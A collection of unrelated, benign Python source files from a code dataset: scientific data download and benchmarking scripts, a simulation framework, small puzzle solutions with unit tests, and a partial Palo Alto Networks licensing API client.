label_list,
np.sum,
float, 0)
for l in range(len(num_elements_by_lesion)):
if num_elements_by_lesion[l] > l_min:
# assign voxels to output
current_voxels = np.stack(np.where(labels == l), axis=1)
output_scan[current_voxels[:, 0],
current_voxels[:, 1],
current_voxels[:, 2]] = 1
# save the output segmentation as Nifti1Image
if save_nifti:
nifti_out = nib.Nifti1Image(output_scan,
affine=orientation)
nifti_out.to_filename(os.path.join(options['test_folder'],
options['test_scan'],
options['experiment'],
options['test_name']))
return output_scan
|
StarcoderdataPython
|
1765205
|
<reponame>bloxmove-com/TE_Simulations_Research_Group
from radcad.engine import Engine
from collections import namedtuple
RunArgs = namedtuple("RunArgs", "simulation timesteps run subset initial_state state_update_blocks parameters deepcopy drop_substeps")
Context = namedtuple("Context", "simulation run subset timesteps initial_state parameters")
class Model:
def __init__(self, initial_state={}, state_update_blocks=[], params={}):
self.initial_state = initial_state
self.state_update_blocks = state_update_blocks
self.params = params
class Simulation:
def __init__(self, model: Model, timesteps=100, runs=1, **kwargs):
self.model = model
self.timesteps = timesteps
self.runs = runs
self.index = kwargs.pop("index", 0)
self.engine = kwargs.pop("engine", Engine())
self.experiment = Experiment(self)
if kwargs:
raise Exception(f"Invalid Simulation option in {kwargs}")
def run(self):
return self.engine._run(experiment=self.experiment)
class Experiment:
"""
An Experiment.
"""
def __init__(self, simulations=[], **kwargs):
self.engine = kwargs.pop("engine", Engine())
self.simulations = []
self.results = []
self.exceptions = []
# Add and validate simulations
self.add_simulations(simulations)
# Hooks
self.before_experiment = kwargs.pop("before_experiment", None)
self.after_experiment = kwargs.pop("after_experiment", None)
self.before_simulation = kwargs.pop("before_simulation", None)
self.after_simulation = kwargs.pop("after_simulation", None)
self.before_run = kwargs.pop("before_run", None)
self.after_run = kwargs.pop("after_run", None)
self.before_subset = kwargs.pop("before_subset", None)
self.after_subset = kwargs.pop("after_subset", None)
if kwargs:
raise Exception(f"Invalid Experiment option in {kwargs}")
def run(self):
return self.engine._run(experiment=self)
def add_simulations(self, simulations):
if not isinstance(simulations, list):
simulations = [simulations]
if any(not isinstance(sim, Simulation) for sim in simulations):
raise Exception("Invalid simulation added")
self.simulations.extend(simulations)
def clear_simulations(self):
cleared = True if self.simulations else False
self.simulations = []
return cleared
def get_simulations(self):
return self.simulations
# Hooks
def _before_experiment(self, experiment=None):
if self.before_experiment:
self.before_experiment(experiment=experiment)
def _after_experiment(self, experiment=None):
if self.after_experiment:
self.after_experiment(experiment=experiment)
def _before_simulation(self, simulation=None):
if self.before_simulation:
self.before_simulation(
simulation=simulation
)
def _after_simulation(self, simulation=None):
if self.after_simulation:
self.after_simulation(
simulation=simulation
)
def _before_run(self, context: Context=None):
if self.before_run:
self.before_run(context=context)
def _after_run(self, context: Context=None):
if self.after_run:
self.after_run(context=context)
def _before_subset(self, context: Context=None):
if self.before_subset:
self.before_subset(context=context)
def _after_subset(self, context: Context=None):
if self.after_subset:
self.after_subset(context=context)
|
StarcoderdataPython
|
3234396
|
<gh_stars>1-10
from ..P9_string_rotation import is_rotated_string, is_rotated_string_naive
def test_rotate_empty():
""" '' in '' is True by convention."""
s1, s2 = '', ''
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_rotate_one_element_true():
s1, s2 = 'a', 'a'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_rotate_one_element_false():
s1, s2 = 'a', 'b'
assert not is_rotated_string_naive(s1, s2)
assert not is_rotated_string(s1, s2)
def test_same_string():
s1, s2 = 'abcdefgh', 'abcdefgh'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_different_lengths():
s1, s2 = 'abcde', 'abcdef'
assert not is_rotated_string_naive(s1, s2)
assert not is_rotated_string(s1, s2)
def test_repeated_pattern():
s1, s2 = 'tictactic', 'tictictac'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_rotated_string():
s1, s2 = 'ttleponymyli', 'mylittlepony'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_not_rotated_string():
s1, s2 = 'Python', 'ythonC'
assert not is_rotated_string_naive(s1, s2)
assert not is_rotated_string(s1, s2)
|
StarcoderdataPython
|
131425
|
<reponame>wpreimes/ecmwf_models<filename>src/ecmwf_models/erainterim/download.py
# -*- coding: utf-8 -*-
"""
Module to download ERA Interim from terminal.
"""
from ecmwfapi import ECMWFDataServer
import argparse
import sys
from datetime import datetime, timedelta
import shutil
import os
import warnings
from ecmwf_models.utils import (
load_var_table,
save_ncs_from_nc,
save_gribs_from_grib,
lookup,
mkdate,
str2bool
)
def default_variables() -> list:
"These variables are being downloaded, when None are passed by the user"
lut = load_var_table(name="ERAINT")
defaults = lut.loc[lut["default"] == 1]["dl_name"].values
return defaults.tolist()
def download_eraint(
target_path,
start,
end,
variables,
grid_size=None,
type="fc",
h_steps=(0, 6, 12, 18),
grb=False,
dry_run=False,
steps=(0,),
):
"""
Download era interim data
Parameters
----------
target_path : str
path at which to save the downloaded grib file
start : date
start date
end : date
end date
variables : list
parameter ids, see wiki
product : str, optional
Name of the model, "ERA-interim" (default) or "ERA5"
grid_size: [float,float], optional
size of the grid in form (lon, lat), which the data is resampled to
If None is passed the minimum grid for the accoring product is chosen
h_steps: tuple, optional (default: (0, 6, 12, 18))
List of full hours to download data at the selected dates
grb: bool, optional (default: False)
Download data as grb files instead of nc files
dry_run: bool
Do not download anything, this is just used for testing the functions
"""
if dry_run:
warnings.warn("Dry run does not create connection to ECMWF")
server = None
else:
server = ECMWFDataServer()
param_strings = []
dataset = "interim"
dataclass = "ei"
for variable in variables:
param_strings.append(str(variable))
timestep_strings = []
for timestep in h_steps:
timestep_strings.append("%02d" % timestep)
param_string = "/".join(param_strings)
timestep_string = "/".join(timestep_strings)
date_string = "%s/to/%s" % (
start.strftime("%Y-%m-%d"),
end.strftime("%Y-%m-%d"),
)
grid_size = "%f/%f" % (grid_size[0], grid_size[1]) if grid_size else None
step = "/".join([str(s) for s in steps])
# ATTENTION: When downloading netcdf files steps and times
# must not overlap!! see:
# https://software.ecmwf.int/wiki/display/CKB/What+to+do+with+ECCODES+ERROR+%3A+Try+using+the+-T+option # noqa: E501
dl_params = {
"class": dataclass,
"dataset": dataset,
"expver": "1",
"stream": "oper",
"type": type,
"levtype": "sfc",
"param": param_string,
"date": date_string,
"time": timestep_string,
"step": step,
"grid": grid_size,
"format": "grib1" if grb else "netcdf",
"target": target_path,
}
if not grid_size:
if not grb:
grid_size = "%f/%f" % (0.75, 0.75)
dl_params["grid"] = grid_size
else:
del dl_params["grid"]
else:
if any(size < 0.75 for size in grid_size):
raise Warning(
"Custom grid smaller than original ERA Interim resolution. "
"See https://software.ecmwf.int/wiki/display/CKB/"
"Does+downloading+data+at+higher+resolution+improve+the+output" # noqa: E501
)
if not dry_run:
server.retrieve(dl_params)
def download_and_move(
target_path,
startdate,
enddate,
variables=None,
keep_original=False,
grid_size=None,
type="an",
h_steps=(0, 6, 12, 18),
steps=(0,),
grb=False,
dry_run=False,
):
"""
Downloads the data from the ECMWF servers and moves them to the target
path. This is done in 30 days increments between start and end date to
be efficient with the MARS system.
See the recommendation for doing it this way in
https://software.ecmwf.int/wiki/display/WEBAPI/ERA-Interim+daily+retrieval+efficiency
The files are then extracted into separate grib/nc files and stored in
yearly folders under the target_path.
Parameters
----------
target_path: str
Path to which to copy the extracted parameter files
startdate: datetime
First date to download
enddate: datetime
Last date to download
variables : list, optional (default: None)
List of variable ids to pass to the client, if None are passed,
the default variable ids will be downloaded.
keep_original: bool, optional (default: False)
Keep the original downloaded data
grid_size: list, optional (default: None)
[lon, lat] extent of the grid (regular for netcdf, at lat=0 for grib)
If None is passed, the default grid size for the data product is used.
type : str, optional (default: 'an')
Data stream, model to download data for (fc=forecase)
h_steps: list, optional (default: [0, 6, 12, 18])
List of full hours to download data at the selected dates
grb: bool, optional (default: False)
Download data as grib files instead of netcdf files
dry_run: bool
Do not download anything, this is just used for testing the functions
"""
product = "eraint"
if variables is None:
variables = default_variables()
else:
# find the dl_names
variables = lookup(name=product, variables=variables)
variables = variables["dl_name"].values.tolist()
td = timedelta(days=30)
current_start = startdate
while current_start <= enddate:
current_end = current_start + td
if current_end >= enddate:
current_end = enddate
fname = "{start}_{end}.{ext}".format(
start=current_start.strftime("%Y%m%d"),
end=current_end.strftime("%Y%m%d"),
ext="grb" if grb else "nc",
)
downloaded_data_path = os.path.join(target_path, "temp_downloaded")
if not os.path.exists(downloaded_data_path):
os.mkdir(downloaded_data_path)
dl_file = os.path.join(downloaded_data_path, fname)
download_eraint(
dl_file,
current_start,
current_end,
variables,
grid_size=grid_size,
h_steps=h_steps,
type=type,
steps=steps,
grb=grb,
dry_run=dry_run,
)
if grb:
save_gribs_from_grib(dl_file, target_path, product.upper())
else:
save_ncs_from_nc(dl_file, target_path, product.upper())
if not keep_original:
shutil.rmtree(downloaded_data_path)
current_start = current_end + timedelta(days=1)
def parse_args(args):
"""
Parse command line parameters for recursive download
Parameters
----------
args : list
Command line parameters as list of strings
Returns
----------
clparams : argparse.Namespace
Parsed command line parameters
"""
parser = argparse.ArgumentParser(
description="Download ERA Interim data (6H) between two dates. "
"Before this program can be used, you have to register at ECMWF "
"and setup your .ecmwfapirc file as described here: "
"https://confluence.ecmwf.int//display/WEBAPI/Access+ECMWF+Public+Datasets#AccessECMWFPublicDatasets-key" # noqa: E501
)
parser.add_argument(
"localroot",
help="Root of local filesystem where the downloaded data is stored.",
)
parser.add_argument(
"-s",
"--start",
type=mkdate,
default=datetime(1979, 1, 1),
help=(
"Startdate in format YYYY-MM-DD. "
"If no data is found there then the first available date of "
"the product is used."
),
)
parser.add_argument(
"-e",
"--end",
type=mkdate,
default=datetime.now(),
help=(
"Enddate in format YYYY-MM-DD. "
"If not given then the current date is used."
),
)
parser.add_argument(
"-var",
"--variables",
metavar="variables",
type=str,
default=None,
nargs="+",
help=(
"Name of variables to download. "
"A list of possible IDs is available at "
"https://github.com/TUW-GEO/ecmwf_models/tree/master/ecmwf_models/erainterim/eraint_lut.csv " # noqa: E501
"or by using the 'View MARS request' option in the web based "
"ordering system."
),
)
parser.add_argument(
"-keep",
"--keep_original",
type=str2bool,
default="False",
help=(
"Keep the originally, temporally downloaded file as it is "
"instead of deleting it afterwards"
),
)
parser.add_argument(
"-grb",
"--as_grib",
type=str2bool,
default="False",
help=(
"Download data in grib1 format instead of the default "
"netcdf format"
),
)
parser.add_argument(
"--h_steps",
type=int,
default=None,
nargs="+",
help=("Manually change the temporal resolution of donwloaded images"),
)
parser.add_argument(
"--steps",
type=int,
default=None,
nargs="+",
help=("Manually change the steps"),
)
parser.add_argument(
"--type",
type=str,
default="an",
help=("Manually set the data stream, e.g. 'an' (default) or 'fc'"),
)
parser.add_argument(
"--grid_size",
type=float,
default=None,
nargs="+",
help=(
"lon lat. Size of the grid that the data is stored to. "
"Should be at least (and is by default) "
"(0.75, 0.75) for ERA-Interim "
),
)
args = parser.parse_args(args)
print("ERA Interim data is deprecated. Use ERA5 instead.")
print(
"Downloading ERA Interim {} data from {} to {} into folder {}".format(
"grib" if args.as_grib is True else "netcdf",
args.start.isoformat(),
args.end.isoformat(),
args.localroot,
)
)
return args
def main(args):
args = parse_args(args)
download_and_move(
target_path=args.localroot,
startdate=args.start,
enddate=args.end,
variables=args.variables,
keep_original=args.keep_original,
grid_size=args.grid_size,
h_steps=args.h_steps,
type=args.type,
grb=args.as_grib,
)
def run():
main(sys.argv[1:])
|
StarcoderdataPython
|
1777220
|
from django.conf.urls import url, include
from .views import ModuleList
urlpatterns = [
url(r'^$', ModuleList.as_view(), name='module_list'),
]
|
StarcoderdataPython
|
1645816
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from collections.abc import Sequence
from random import random
from time import perf_counter, sleep
import numpy as np
import pandas as pd
import yaml
from sklearn.cluster import KMeans as CPUKMeans
from sklearn.datasets import make_blobs
from sklearn.metrics import adjusted_rand_score, calinski_harabasz_score
from tqdm import tqdm
from dpu_kmeans import KMeans as DPU_KMeans
from dpu_kmeans import _dimm
def get_int_keys(d: dict, prefix=()) -> list:
"""
Recursively returns the keys of a dictionary that hold integers.
"""
keys = []
for k, v in d.items():
if (
isinstance(v, int)
and not isinstance(v, bool)
or isinstance(v, list)
and all(isinstance(n, int) for n in v)
):
rec_key = prefix + (k,)
keys.append(rec_key)
elif isinstance(v, dict):
keys.extend(get_int_keys(v, prefix + (k,)))
return keys
def get_experiments() -> pd.DataFrame:
"""
Loads the experiments from the params.yaml file.
"""
# load the params.yaml file as a dictionary
# script_dir = os.path.dirname(__file__)
# params_file = os.path.join(script_dir, "params.yaml")
params_file = "params.yaml"
with open(params_file, "r") as f:
params = yaml.load(f, Loader=yaml.FullLoader)
# convert number of points to an integer
params["data"]["n_points"] = int(params["data"]["n_points"])
# convert the dictionary to a pandas DataFrame and explode the experiments
df = pd.DataFrame.from_dict(params, orient="index").stack().to_frame().transpose()
for col in list(df.columns):
df = df.explode(col, ignore_index=True)
df["data", "n_points"] = df.apply(
lambda row: row["data", "n_points"] * row["dimm", "n_dpu"]
if row["data", "scaling"]
else row["data", "n_points"],
axis=1,
)
# convert integer columns back to int type as this was lost in the dataframe creation
integer_columns = get_int_keys(params)
for column in df:
if column in integer_columns:
df[column] = df[column].astype(int)
# adding a layer to the multi-index
df = pd.concat([df], axis=1, keys=["inputs"])
return df
def get_desc(nonconstants: Sequence, params: pd.DataFrame) -> str:
"""
Returns the description of a set of parameters.
"""
return (
"(" + ", ".join([p + ": " + str(params[p]) for p in nonconstants]) + ")"
if len(nonconstants) > 0
else ""
)
def generate_dataset(**kwargs) -> np.ndarray:
"""
Generates a dataset
"""
data, _ = make_blobs(
n_samples=kwargs["n_points"],
n_features=kwargs["n_dim"],
centers=kwargs["centers"],
random_state=kwargs["random_state"],
)
return data
def load_dataset(**kwargs) -> np.ndarray:
"""
Loads a dataset
"""
# script_dir = os.path.dirname(__file__)
dataset_name = kwargs["name"]
dataset_file = os.path.join("data", dataset_name + ".pq")
df = pd.read_parquet(dataset_file)
data = np.require(
df.iloc[:, 1:].to_numpy(dtype=np.float32), requirements=["C", "A", "O"]
)
return data
def get_dataset(**kwargs) -> np.ndarray:
"""
Generates or load a dataset
"""
if kwargs["synthetic"]:
return generate_dataset(**kwargs)
else:
return load_dataset(**kwargs)
def run_benchmark(verbose: bool = False) -> None:
"""
Runs the benchmark.
"""
# load the experiments
df = get_experiments()
# run the experiments
# get unique dataset parameters
datasets = df.inputs.data.drop_duplicates()
nonconstant_data = datasets.columns[datasets.nunique() > 1]
for _, dataset in (pbar_data := tqdm(datasets.iterrows(), total=datasets.shape[0])):
desc = get_desc(nonconstant_data, dataset)
pbar_data.set_description(f"getting dataset {desc}")
##################################################
# DATA GEN #
##################################################
data = get_dataset(**dataset)
pbar_data.set_description(f"with dataset {desc}")
dataset_df = df[(df.inputs.data == dataset).all(axis=1)]
trains = dataset_df.inputs.train.drop_duplicates()
nonconstant_train = trains.columns[trains.nunique() > 1]
for _, train_param in (
pbar_train := tqdm(trains.iterrows(), total=trains.shape[0], leave=False)
):
desc = get_desc(nonconstant_train, train_param)
pbar_train.set_description(f"running CPU {desc}")
##################################################
# CPU PERF #
##################################################
# perform the clustering on CPU
tic = perf_counter()
CPU_kmeans = CPUKMeans(
init="random",
verbose=verbose,
copy_x=False,
algorithm="full",
**train_param,
)
CPU_kmeans.fit(data)
toc = perf_counter()
pbar_train.set_description(f"scoring CPU {desc}")
# logging the results
cpu_index = (df.inputs.data == dataset).all(axis=1) & (
df.inputs.train == train_param
).all(axis=1)
df.loc[cpu_index, ("results", "cpu", "times")] = toc - tic
df.loc[
cpu_index, ("results", "cpu", "train_times")
] = CPU_kmeans.train_time_
df.loc[
cpu_index, ("results", "cpu", "preprocessing_times")
] = CPU_kmeans.preprocessing_timer_
df.loc[
cpu_index, ("results", "cpu", "single_kmeans_times")
] = CPU_kmeans.main_loop_timer_
df.loc[cpu_index, ("results", "cpu", "iterations")] = CPU_kmeans.n_iter_
df.loc[cpu_index, ("results", "cpu", "times_one_iter")] = (
CPU_kmeans.main_loop_timer_ / CPU_kmeans.n_iter_
)
# computing score
df.loc[cpu_index, ("results", "cpu", "score")] = calinski_harabasz_score(
data, CPU_kmeans.labels_
)
pbar_train.set_description(f"running DPU {desc}")
train_param_df = dataset_df[
(dataset_df.inputs.train == train_param).all(axis=1)
]
dimms = train_param_df.inputs.dimm.drop_duplicates()
nonconstant_dimm = dimms.columns[dimms.nunique() > 1]
for _, dimm_param in (
pbar_dimm := tqdm(dimms.iterrows(), total=dimms.shape[0], leave=False)
):
desc = get_desc(nonconstant_dimm, dimm_param)
pbar_dimm.set_description(f"on dimm {desc}")
##################################################
# DPU PERF #
##################################################
# load the DPUS
_dimm.free_dpus()
tic = perf_counter()
_dimm.set_n_dpu(dimm_param["n_dpu"])
_dimm.load_kernel("kmeans", verbose)
toc = perf_counter()
DPU_init_time = toc - tic
# perform the clustering on DPU
tic = perf_counter()
DPU_kmeans = DPU_KMeans(
init="random",
verbose=verbose,
copy_x=False,
reload_data=True,
**train_param,
)
DPU_kmeans.fit(data)
toc = perf_counter()
pbar_train.set_description(f"scoring {desc}")
# logging the results
dimm_index = (
(df.inputs.data == dataset).all(axis=1)
& (df.inputs.train == train_param).all(axis=1)
& (df.inputs.dimm == dimm_param).all(axis=1)
)
df.loc[dimm_index, ("results", "dpu", "times")] = toc - tic
df.loc[
dimm_index, ("results", "dpu", "train_times")
] = DPU_kmeans.train_time_
df.loc[dimm_index, ("results", "dpu", "init_times")] = DPU_init_time
df.loc[
dimm_index, ("results", "dpu", "preprocessing_times")
] = DPU_kmeans.preprocessing_timer_
df.loc[
dimm_index, ("results", "dpu", "cpu_pim_times")
] = DPU_kmeans.cpu_pim_time_
df.loc[
dimm_index, ("results", "dpu", "pim_cpu_times")
] = DPU_kmeans.pim_cpu_time_
df.loc[
dimm_index, ("results", "dpu", "inertia_times")
] = DPU_kmeans.inertia_timer_
df.loc[
dimm_index, ("results", "dpu", "reallocate_times")
] = DPU_kmeans.reallocate_timer_
df.loc[
dimm_index, ("results", "dpu", "single_kmeans_times")
] = DPU_kmeans.main_loop_timer_
df.loc[
dimm_index, ("results", "dpu", "kernel_runtime")
] = DPU_kmeans.dpu_run_time_
df.loc[dimm_index, ("results", "dpu", "inter_pim_core_times")] = (
DPU_kmeans.main_loop_timer_ - DPU_kmeans.dpu_run_time_
)
df.loc[
dimm_index, ("results", "dpu", "iterations")
] = DPU_kmeans.n_iter_
df.loc[dimm_index, ("results", "dpu", "times_one_iter")] = (
DPU_kmeans.main_loop_timer_ / DPU_kmeans.n_iter_
)
# computing score
df.loc[
dimm_index, ("results", "dpu", "score")
] = calinski_harabasz_score(data, DPU_kmeans.labels_)
df.loc[
dimm_index, ("results", "dpu", "cross_score")
] = adjusted_rand_score(CPU_kmeans.labels_, DPU_kmeans.labels_)
# print(df)
# df.to_csv("benchmarks.csv", index=False)
# important_columns = df.columns[df.nunique() > 1]
# print(important_columns)
# df_readable = df[important_columns]
# df_readable.to_csv("results.csv", index=False)
return df
def experiment_outputs(df: pd.DataFrame) -> None:
"""
Outputs the results of the experiment
"""
# output the entire benchmarks table
df.to_csv("benchmarks.csv", index=False)
# output the important results table
important_input_columns = df.inputs.columns[df.inputs.nunique() > 1]
important_output_columns = [(c[1:]) for c in df.columns if c[2] in ("train_times",)]
df_readable = pd.concat(
(df.inputs[important_input_columns], df.results[important_output_columns]),
axis=1,
)
# df_readable.set_index(important_input_columns.to_list(), inplace=True)
df_readable.columns = ["_".join(col) for col in df_readable.columns.values]
# param_index = "--".join(["_".join(name) for name in df_readable.index.names])
# df_readable.index = df_readable.index.to_flat_index()
# df_readable.index.rename(param_index, inplace=True)
df_readable.to_csv("results.csv", index=False)
if __name__ == "__main__":
df = run_benchmark()
experiment_outputs(df)
|
StarcoderdataPython
|
1604676
|
<reponame>wuljchange/interesting_python
import numpy as np
if __name__ == "__main__":
"""
使用numpy模块来对数组进行运算
"""
x = [1, 2, 3, 4]
y = [5, 6, 7, 8]
print(x+y)
print(x*2)
nx = np.array(x)
ny = np.array(y)
print(nx*2)
print(nx+10)
print(nx+ny)
print(np.sqrt(nx))
print(np.cos(nx))
# 二维数组操作
a = np.array([[1, 2, 3], [2, 3, 4]])
# select row 1
print(a[1])
# select column 1
print(a[:, 1])
print(np.where(a > 1, a, 0))
|
StarcoderdataPython
|
3325490
|
<reponame>zseen/advent-of-code
import unittest
from typing import List
from enum import Enum
from copy import deepcopy
INPUT_FILE = "input.txt"
TEST_INPUT_FILE_LOOP = "test_input_loop.txt"
class Operation(Enum):
JUMP = "jmp"
ACCUMULATE = "acc"
NO_OPERATION = "nop"
class Instruction:
def __init__(self, operation: str, argument: int):
self.operation: str = operation
self.argument: int = argument
class TerminationOutcome:
def __init__(self, accumulatorCount: int, isEndOfInstructionsReached: bool):
self.accumulatorCount: int = accumulatorCount
self.isEndOfInstructionsReached: bool = isEndOfInstructionsReached
def getAccumulatorCountInOneLoop(instructions: List[Instruction]):
return getTerminationConditions(instructions).accumulatorCount
def getTerminationConditions(instructions: List[Instruction]):
accumulatorCount = 0
if not instructions:
raise ValueError("No instructions to follow")
currentInstructionIndex = 0
executedInstructionsInProcess = set()
shouldTerminate = False
while not shouldTerminate:
currentInstruction = instructions[currentInstructionIndex]
if currentInstruction in executedInstructionsInProcess:
break
if currentInstruction.operation == Operation.NO_OPERATION.value:
currentInstructionIndex += 1
elif currentInstruction.operation == Operation.ACCUMULATE.value:
accumulatorCount += currentInstruction.argument
currentInstructionIndex += 1
elif currentInstruction.operation == Operation.JUMP.value:
currentInstructionIndex += currentInstruction.argument
else:
raise ValueError("Unexpected instruction")
executedInstructionsInProcess.add(currentInstruction)
shouldTerminate = currentInstructionIndex == len(instructions)
return TerminationOutcome(accumulatorCount, shouldTerminate)
def getAccumulatorCountWithRepairedInstructionProcess(instructions: List[Instruction]):
for i in range(0, len(instructions)):
modifiedInstructions = deepcopy(instructions)
if modifiedInstructions[i].operation == Operation.JUMP.value:
modifiedInstructions[i].operation = Operation.NO_OPERATION.value
elif modifiedInstructions[i].operation == Operation.NO_OPERATION.value:
modifiedInstructions[i].operation = Operation.JUMP.value
else:
continue
terminationState = getTerminationConditions(modifiedInstructions)
if terminationState.isEndOfInstructionsReached:
return terminationState.accumulatorCount
raise ValueError("Could not be repaired.")
def getInput(inputFile):
instructionsLines = []
with open(inputFile, "r") as inputFile:
lines = inputFile.readlines()
for line in lines:
line = line.strip("\n")
line = line.split(" ")
instruction = Instruction(line[0], int(line[1]))
instructionsLines.append(instruction)
return instructionsLines
def main():
instructions = getInput(INPUT_FILE)
accumulatorCountInOneLoop = getAccumulatorCountInOneLoop(instructions)
print(accumulatorCountInOneLoop) # 1594
accumulatorCountIfTerminationRepaired = getAccumulatorCountWithRepairedInstructionProcess(instructions)
print(accumulatorCountIfTerminationRepaired) # 758
class AccumulatorCounter(unittest.TestCase):
def test_getAccumulatorCountInOneLoop_loopingInstructions_correctCountReturned(self):
instructions = getInput(TEST_INPUT_FILE_LOOP)
accumulatorCount = getAccumulatorCountInOneLoop(instructions)
self.assertEqual(5, accumulatorCount)
def test_getAccumulatorCountWithRepairedInstructionProcess_loopingInstructions_correctCountReturned(self):
instructions = getInput(TEST_INPUT_FILE_LOOP)
accumulatorCount = getAccumulatorCountWithRepairedInstructionProcess(instructions)
self.assertEqual(8, accumulatorCount)
if __name__ == '__main__':
# main()
unittest.main()
|
StarcoderdataPython
|
4827130
|
#!/usr/bin/env python
#
# Copyright (c) 2017 Palo Alto Networks, Inc. <<EMAIL>>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from __future__ import print_function
import getopt
import json
import logging
import os
import pprint
import sys
libpath = os.path.dirname(os.path.abspath(__file__))
sys.path[:0] = [os.path.join(libpath, os.pardir, 'lib')]
import pan.licapi
debug = 0
INDENT = 4 # pprint.pformat()
def main():
options = parse_opts()
if options['debug']:
logger = logging.getLogger()
if options['debug'] == 3:
logger.setLevel(pan.licapi.DEBUG3)
elif options['debug'] == 2:
logger.setLevel(pan.licapi.DEBUG2)
elif options['debug'] == 1:
logger.setLevel(pan.licapi.DEBUG1)
log_format = '%(message)s'
handler = logging.StreamHandler()
formatter = logging.Formatter(log_format)
handler.setFormatter(formatter)
logger.addHandler(handler)
try:
licapi = pan.licapi.PanLicapi(panrc_tag=options['panrc_tag'],
api_key=options['api_key'],
api_version=options['api_version'],
hostname=options['hostname'],
timeout=options['timeout'],
verify_cert=options['ssl'])
except pan.licapi.PanLicapiError as e:
print('pan.licapi.PanLicapi:', e, file=sys.stderr)
sys.exit(1)
if False:
pass
elif options['activate']:
activate(licapi, options)
elif options['deactivate']:
deactivate(licapi, options)
elif options['get']:
get(licapi, options)
sys.exit(0)
def activate(licapi, options):
try:
action = 'activate'
r = licapi.activate(authcode=options['authcode'],
uuid=options['uuid'],
cpuid=options['cpuid'],
serialnumber=options['serial'])
print_status(action, r)
print_response(r, options)
exit_for_http_status(r)
except pan.licapi.PanLicapiError as e:
print_exception(action, e)
sys.exit(1)
if options['key_file'] or options['xml_file']:
write_keys(r, options)
def deactivate(licapi, options):
try:
action = 'deactivate'
r = licapi.deactivate(encryptedtoken=options['token'])
print_status(action, r)
print_response(r, options)
exit_for_http_status(r)
except pan.licapi.PanLicapiError as e:
print_exception(action, e)
sys.exit(1)
def get(licapi, options):
try:
action = 'get'
r = licapi.get(authcode=options['authcode'])
print_status(action, r)
print_response(r, options)
exit_for_http_status(r)
except pan.licapi.PanLicapiError as e:
print_exception(action, e)
sys.exit(1)
def write_keys(r, options):
if r.json is None:
print('No JSON response for write license keys', file=sys.stderr)
sys.exit(1)
if not isinstance(r.json, list):
print('JSON response not list: %s',
pprint.pformat(key, indent=INDENT),
file=sys.stderr)
sys.exit(1)
for key in r.json:
if not ('partidField' in key and 'keyField' in key):
print('Malformed license: %s' %
pprint.pformat(key, indent=INDENT),
file=sys.stderr)
continue
if 'typeField' in key and key['typeField'] == 'SUP':
if debug > 0:
print('Support license skipped',
end='', file=sys.stderr)
if 'feature_descField' in key:
print(': %s' % key['feature_descField'],
end='', file=sys.stderr)
print()
continue
prefix = options['uuid'] if options['uuid'] else options['serial']
files = []
if options['key_file']:
file = prefix + '-' + key['partidField'] + '.key'
if options['dst'] is None:
path = file
else:
path = os.path.join(options['dst'], file)
files.append((path, key['keyField']))
if options['xml_file']:
file = prefix + '-' + key['partidField'] + '.xml'
if options['dst'] is None:
path = file
else:
path = os.path.join(options['dst'], file)
files.append((path, install_xml(key['keyField'])))
for x in files:
if not write_key(*x):
continue
print('%s' % os.path.basename(x[0]), end='')
if 'feature_descField' in key:
print(': %s' % key['feature_descField'])
else:
print()
def write_key(path, x):
try:
f = open(path, 'w')
except IOError as e:
print('open %s: %s' % (path, e), file=sys.stderr)
return False
try:
f.write(x)
except IOError as e:
print('write %s: %s' % (path, e), file=sys.stderr)
return False
finally:
f.close()
return True
def install_xml(x):
document = '''\
<request><license><install>
%s\
</install></license></request>
'''
return document % x
def print_exception(action, e):
print('%s:' % action, end='', file=sys.stderr)
print(' "%s"' % e, file=sys.stderr)
def print_status(action, r):
print('%s:' % action, end='', file=sys.stderr)
if r.http_code is not None:
print(' %s' % r.http_code, end='', file=sys.stderr)
if r.http_reason is not None:
print(' %s' % r.http_reason, end='', file=sys.stderr)
if r.http_headers is not None:
# XXX
content_type = r.http_headers.get('content-type')
if False and content_type is not None:
print(' %s' % content_type, end='', file=sys.stderr)
length = r.http_headers.get('content-length')
if length is not None:
print(' %s' % length, end='', file=sys.stderr)
print(' %.2fsecs' % r.wall_time, end='', file=sys.stderr)
if r.json is not None:
if 'Message' in r.json:
print(' "%s"' % r.json['Message'],
end='', file=sys.stderr)
print(file=sys.stderr)
def print_response(r, options):
if r.http_text is None:
return
if r.http_content_type is None:
return
if r.http_content_type == 'text/html':
# XXX
print(r.http_text)
elif r.http_content_type == 'application/json':
if options['print_json']:
print_json(r.http_text, isjson=True)
if options['print_python']:
print_python(r.http_text, isjson=True)
def exit_for_http_status(r):
if r.http_code is not None:
if not (200 <= r.http_code < 300):
sys.exit(1)
else:
return
sys.exit(1)
def print_python(obj, isjson=False):
if isjson:
try:
obj = json.loads(obj)
except ValueError as e:
print(e, file=sys.stderr)
print(obj, file=sys.stderr)
sys.exit(1)
print(pprint.pformat(obj, indent=INDENT))
def print_json(obj, isjson=False):
if isjson:
try:
obj = json.loads(obj)
except ValueError as e:
print(e, file=sys.stderr)
print(obj, file=sys.stderr)
sys.exit(1)
print(json.dumps(obj, sort_keys=True, indent=INDENT,
separators=(',', ': ')))
def process_arg(s, list=False):
stdin_char = '-'
if s == stdin_char:
lines = sys.stdin.readlines()
else:
try:
f = open(s)
lines = f.readlines()
f.close()
except IOError:
lines = [s]
if debug > 1:
print('lines:', lines, file=sys.stderr)
if list:
